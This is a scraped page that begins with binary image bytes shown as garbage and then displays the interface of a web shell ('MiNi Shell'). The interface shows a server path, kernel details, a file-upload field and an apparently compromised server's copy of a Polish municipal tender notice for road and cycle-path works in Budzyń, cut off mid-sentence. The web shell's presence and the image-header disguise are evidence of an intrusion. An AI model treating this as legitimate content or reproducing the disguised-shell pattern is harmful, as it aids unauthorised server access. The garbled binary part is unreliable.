JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250616/0028065701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ulicy Gimnazjalnej wraz z ciągiem pieszo-rowerowym w m. Budzyń </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BUDZYŃ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791017</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Przemysłowa 16 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Budzyń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-840</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67 2843201; 2843313;</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">67 2843 370</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@budzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.budzyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ulicy Gimnazjalnej wraz z ciągiem pieszo-rowerowym w m. Budzyń </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-48ca538f-0091-4163-9e43-d2993b6869a1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00280657</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00032215/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa ulicy Gimnazjalnej wraz z ciągiem pieszorowerowym w m. Budzyń</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-48ca538f-0091-4163-9e43-d2993b6869a1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Wszelkie informacje znajdują się w rozdziale I i II SWZ oraz na<br/>https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wszelkie informacje znajdują się wrozdziale II SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wszelkie informacje znajdują się w rozdziale XXV oraz XXVI SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wszelkie informacje znajdują się w rozdziale XXV oraz XXVI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKM.272.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje wykonanie robót budowlanych związanych z budową ulicy Gimnazjalnej w miejscowości Budzyń wraz z ciągiem pieszo-rowerowym, oświetleniem drogowym, wykonaniem odwodnienia terenu wykonaniem przepustu na rowie melioracyjnym, oraz częściowym jej remontem mającym na celu poprawę bezpieczeństwa użytkowania drogi <br/>w obszarze skrzyżowania z ulicą Rogozińską <br/>Zadanie 1: <br/>Zakres robót dotyczy budowy ścieżki pieszo – rowerowej wzdłuż drogi gminnej nr 201575P ul. Gimnazjalna (odc. A) rozpoczynającej się od km 0+006.13, a kończącej się w km 0+252.88 - połączenie z istniejącą ścieżką rowerową wzdłuż ulicy Rogozińskiej. <br/>Zadanie obejmuje również budowę drogi gminnej nr 201576P ul. Gimnazjalna (odc. B) wraz z ciągiem pieszo – rowerowym połączonej z drogą gminną nr 201575P ul. Gimnazjalna (odc. A) w jej km 0+132.27. Początek budowy drogi w km 0+003, koniec w km 0+087.72<br/>Wykonana zostanie również budowa oświetlenia drogowego oraz elementów odwodnienia.<br/>Całość prac do wykonania na terenie działek o numerach ewidencji geodezyjnej gruntów 995/3, 995/8, 993/4, 992/3, 990/2, 988 obręb ewidencyjny Budzyń miasto, gm. Budzyń, powiat chodzieski, województwo wielkopolskie.<br/>Główne założenia i parametry branży drogowej:<br/>Stan istniejący:<br/>Na odcinku drogi gminnej nr 201575P ul. Gimnazjalna (odc. A) od km 0+006.13 do km 0+252.88, zlokalizowana jest droga o nawierzchni bitumicznej ze ściekami z kostki brukowej, zaramowana krawężnikiem betonowym. Brak na przedmiotowym odcinku wydzielonych ciągów do komunikacji rowerowej oraz pieszej. <br/>Droga gminna nr 201576P ul. Gimnazjalna (odc. B) od km 0+003 do km 0+087.72. w stanie istniejącym, drogi utwardzone są gruzem budowlanym, część posiada nawierzchnie gruntową. Brak utwardzonych zjazdów do posesji w liniach rozgraniczających drogi. Brak na przedmiotowym odcinku wydzielonych ciągów do komunikacji rowerowej oraz pieszej. <br/>Istniejąca nawierzchnia zdeformowana w przekroju poprzecznym i podłużnym. <br/>W obszarze objętym niniejszym opracowaniem występują następujące sieci: <br/>•	wodociągowa, <br/>•	kanalizacyjna, <br/>•	gazowa <br/>Budowa drogi gminnej nr 201576P ul. Gimnazjalna (odcinek B) klasa D od km 0+003 do km 0+087.72 wraz z ze ścieżką pieszo - rowerową <br/>•	Klasa techniczna: (D); <br/>•	Prędkość projektowa: 30 km/h; <br/>•	Kategoria ruchu: KR1; <br/>•	Długość: od km 0+003 do km 0+087.72 = 84.72 m <br/>•	Szerokość jezdni: szerokość podstawowa 6.0 m <br/>•	Szerokość ciągu pieszo-rowerowego: 3 m; <br/>•	Spadek jezdni - daszkowy 2% <br/>•	Spadek ciągu pieszo-rowerowego – jednostronny 2% w kierunku jezdni, <br/>•	Nachylenie skarp 1:1,5; <br/>•	Obramowania i trwałe wydzielenia: krawężniki i obrzeża betonowe; <br/>•	Odwodnienie pasa drogowego: odprowadzanie wód opadowych i roztopowych, przez powierzchniowy system odwodnienia projektowane pochylenia podłużne i poprzeczne drogi do projektowanych wpustów deszczowych włączonych do projektowanej kanalizacji deszczowej <br/>•	Oznakowanie poziome i pionowe wg projektu stałej organizacji ruchu, <br/>•	Oznakowanie pionowe: wg projektu stałej organizacji ruchu, <br/>•	Zjazd do posesji wyokrąglony łukami o R = 3 m, projektowany po stronie prawej zjazd na drogę boczną - łuki o promieniu R = 5 m, po stornie lewej ze względu na brak zabudowy nie zaprojektowano zjazdów (w celu umożliwienia późniejszego połącznia działek bez ingerencje w wykonaną drogę, krawężnik na całej długości zaplanowano jako zjazdowy wystawiony ponad jezdnię 4 cm) <br/>•	Połączenie drogi gminnej nr 201576P ul. Gimnazjalna (odc. B) z drogą gminną nr 201575P ul. Gimnazjalna (odc. A) nr 201575P ul. Gimnazjalna (odc. A) wyokrąglone łukami o R = 8 m <br/>Budowa ścieżki pieszo rowerowa wzdłuż drogi gminnej nr 201575P ul. Gimnazjalna (odc. A) <br/>klasa L od km 0+006.13 do km 0+252.88.<br/>•	Klasa techniczna: (L); <br/>•	Prędkość projektowa: 40 km/h; <br/>•	Kategoria ruchu: KR1; <br/>•	Długość: od km 0+006.13 do km 0+252.88 = 84.72 m <br/>•	Szerokość jezdni: szerokość podstawowa 6.0 m <br/>•	Szerokość ciągu pieszo-rowerowego: 3 m; <br/>•	Spadek jezdni - daszkowy 2% <br/>•	Spadek ciągu pieszo-rowerowego – jednostronny 2% w kierunku jezdni, <br/>•	Nachylenie skarp 1:1,5; <br/>•	Obramowania i trwałe wydzielenia: krawężniki i obrzeża betonowe; <br/>•	Odwodnienie pasa drogowego: odprowadzanie wód opadowych i roztopowych, przez powierzchniowy system odwodnienia projektowane pochylenia podłużne i poprzeczne <br/>drogi do istniejących wpustów deszczowych włączonych do istniejącej kanalizacji deszczowej<br/>•	Oznakowanie poziome i pionowe wg projektu stałej organizacji ruchu, <br/>•	Oznakowanie pionowe: wg projektu stałej organizacji ruchu, <br/>Główne założenia i parametry branży elektrycznej:<br/>• Wykonanie linii kablowych dla zasilania latarni oświetleniowych, wykonanych kablami YAKY 4x25mm2 o łącznej długości 441m;<br/>• Wykonanie instalacji uziemiającej słupy latarni oświetleniowych bednarką FeZn 24x4 o łącznej długości 441m;<br/>•	Ustawienie słupów oświetleniowych wraz z oprawami szt. 14;<br/>•	Wykonanie pomiarów pomontażowych.<br/><br/>Główne założenia i parametry branży sanitarnej w zakresie odwodnienia:<br/>Odwodnienie drogi obejmuje wykonanie :<br/>•	Przykanalik deszczowy PCV Ø 250 SN 12 lita 17,0m<br/>•	Przykanalik deszczowy PCV Ø 200 SN 12 lita 41,0m<br/>•	wpust deszczowy PCV/PP Ø 600mm (z osadnikiem 1,0m) 4 szt.<br/>•	studnia deszczowa PCV/PP Ø 600mm 2 szt.<br/>•	studnia betonowa deszczowa Ø 1000mm 1 szt.<br/>•	odwodnienie liniowe polimerobetonowe ze studzienką osadnikową kl.F900, Bz=354mm, Lc=5,0m 1 kpl.<br/>Główne założenia i parametry branży sanitarnej w zakresie wykonania przepustu na rowie melioracyjnym<br/>Prace na rowie obejmują wykonanie :<br/>•	Przepustu z rur PP/PEHD Ø 600 mm SN10 - 9,5 m<br/>•	Główki przepustu prefabrykowane dokowe Ø 600 mm - 2 kpl<br/>•	Odmulenie i wyczyszczenie dna rowu na dł. 50,0m (poniżej i powyżej dna przepustu) - łącznie 100 m/ 1 kpl<br/>Uwaga: Wykonawca w ramach zadania przygotuje niezbędne dokumenty do zgłoszenia rozpoczęcia i zakończenia robót budowlanych do Powiatowego Inspektora Nadzoru Budowlanego w Chodzieży, wynikających z decyzji pozwolenia na budowę<br/><br/>Zadanie 2: <br/>Zakres dla tego zadania dotyczy wykonania robót budowlanych branży drogowej związanych z częściowym remontem drogi gminnej nr 201575P ul. Gimnazjalna (odc. A) w m. Budzyń. Zakres remontu - od km 0+470 do km 0+591.74 – połącznie z ul. Rogozińską<br/>Założenia projektowe dla remontowanej drogi: <br/>•	Klasa drogi – L <br/>•	Kategoria obciążenia ruchem – KR2 <br/>•	Prędkość projektowa 30 km/h <br/>•	Szerokość podstawowa jezdni wraz z ściekami przy krawężnikowymi 6 m <br/>•	Droga przebiegająca w terenie zabudowy <br/>•	Droga jednojezdniowa, dwukierunkowa przekrój 1x2 <br/>•	Istniejące zjazdy bitumiczne – nawierzchnia do remontu po istniejącym śladzie <br/>•	Istniejąca ścieżka pieszo-rowerowa do regulacji wysokościowej na połączeniu w miejscu przejścia dla pieszych <br/>Główne założenia i parametry branży drogowej:<br/>Planuje się wykonanie remontu nawierzchni po istniejącym śladzie o szerokości 6 m (wraz ze ściekami przy krawężnikowymi) – warstwa ścieralna z betonu asfaltowego AC11S o gr. 5 cm, warstwy wyrównawczej w miejscu korekty niwelety gr. zmienna z betonu asfaltowego AC11W. Przed wykonywaniem prac bitumicznych przewidziano wykonanie frezowania profilującego w celu uzyskania odpowiedniego profilu podłużnego oraz spadków poprzecznych. <br/>W ramach zadania przewidziano regulację wysokościową połączenia ścieżki pieszo-rowerowej w miejscu przejścia dla pieszych w celu prawidłowego bezuskokowaego połączenia. Ścieżka zaramowana obrzeżem gr. 8 cm na ławie betonowej z oporem, nawierzchni ścieżki z kostki brukowej betonowej gr. 8 cm. <br/>Prze przejściami dla pieszych należy ułożyć płytki ostrzegawcze koloru żółtego o wymiarach 30 x 30 cm gr. 8 cm z polimerobetonu. <br/>W ramach zadania należy wykonać odtworzenie zjazdów.<br/><br/>Szczegółowy opis i zakres wykonania przedmiotu zamówienia zawiera dokumentacja projektowa, <br/>w skład której wchodzą:<br/>- projekt budowlany, projekt zagospodarowania terenu, projekty techniczne branża drogowa, elektryczna, sanitarna (zadanie nr 1) , <br/> - załącznik do zgłoszenia robót budowlanych (zadanie nr 2),<br/>- kosztorysy ofertowe /przedmiary robót – (zadanie nr 1, zadanie nr 2), <br/>- Specyfikacje Techniczne Wykonania i Odbioru Robót budowlanych ( dalej STWiORB).<br/>Dokumentacja projektowa dostępna jest na stronie internetowej prowadzonego postępowania pod adresem : https://ezamowienia.gov.pl<br/>Uwaga:<br/>- Powyższe dokumenty zostały pogrupowane odpowiednio dla każdego z przewidzianych zadań przedmiotu zamówienia i stanowią Załącznik nr 9 do niniejszej SWZ .<br/>-Załączone przedmiary robót(kosztorysy ofertowe) służy wykonawcom jako pomoc w oszacowaniu kosztów inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">80 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszelkie informacje znajdują się w rozdziale XVI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu, dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym;<br/> Zamawiający nie określa warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/> Zamawiający nie określa warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej i finansowej t.j.: posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 500 000,00 zł (słownie: pięćset tysięcy złotych 00/100), co potwierdzą poprzez złożenie aktualnej informacji banku;<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonego oświadczenia wg załącznika Nr 2 oraz informacji banku złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA<br/>4) zdolności technicznej lub zawodowej w zakresie tj.:<br/>	a) Doświadczenia - posiadają doświadczenie umożliwiające realizację zamówienia tzn. wykonali należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali zgodnie z zasadami wiedzy technicznej i prawidłowo ukończyli co najmniej:<br/>- jedną robotę budowlaną polegającą na budowie lub przebudowie drogi/dróg wraz ze ścieżką rowerową lub pieszo-rowerową, o nawierzchni jezdni z kostki betonowej o pow. min. 500 m², wraz z elementami odwodnienia terenu (tj. budowie/przebudowie rurociągów kanalizacji deszczowej lub porównywalne np. sieci sanitarnej) i oświetleniem drogowym <br/>i wartości robót minimum 500 000,00 zł brutto każda (słownie: pięćset tysięcy złotych 00/00), <br/> oraz <br/>- jedną robotę budowlaną polegające na budowie lub przebudowie lub remoncie drogi o nawierzchni jezdni z masy bitumicznej o pow. min. 500 m², i wartości robót minimum 100 000,00 zł brutto każda (słownie: sto tysięcy złotych 00/00), co potwierdzą łącznie w wykazie wykonanych robót oraz referencjami;<br/>Uwaga:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się w ramach posiadanego doświadczenia jednym zadaniem łącznie spełniającym oba powyższe warunki i łącznej kwocie zadania wynoszącej 600 000,00 zł brutto (słownie: sześćset tysięcy złotych 00/00), <br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie złożonego oświadczenia wg załącznika Nr 2 oraz dokumentów złożonych przez wykonawcę potwierdzających należyte wykonanie robót - na zasadzie SPEŁNIA/NIESPEŁNIA.<br/>b)	Dysponują osobami zdolnymi do wykonania zamówienia :<br/>- Kierownik budowy – osoba posiadająca uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tej specjalności, <br/> - Kierownik robót elektrycznych – osoba posiadająca uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tych specjalnościach,<br/> - Kierownik robót sanitarnych – osoba posiadająca uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tych specjalnościach,<br/>co potwierdzą poprzez złożenie oświadczenia i w wykazie osób zdolnych do realizacji zamówienia (wg załącznika Nr 5). <br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie wykazu osób zdolnych do wykonania zamówienia złożonego przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia przez wykonawcę braku podstaw wykluczenia z postępowania, Zamawiający żąda złożenia :<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - wystawione nie wcześniej niż 3 miesiące przed ich złożeniem,<br/>2)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy 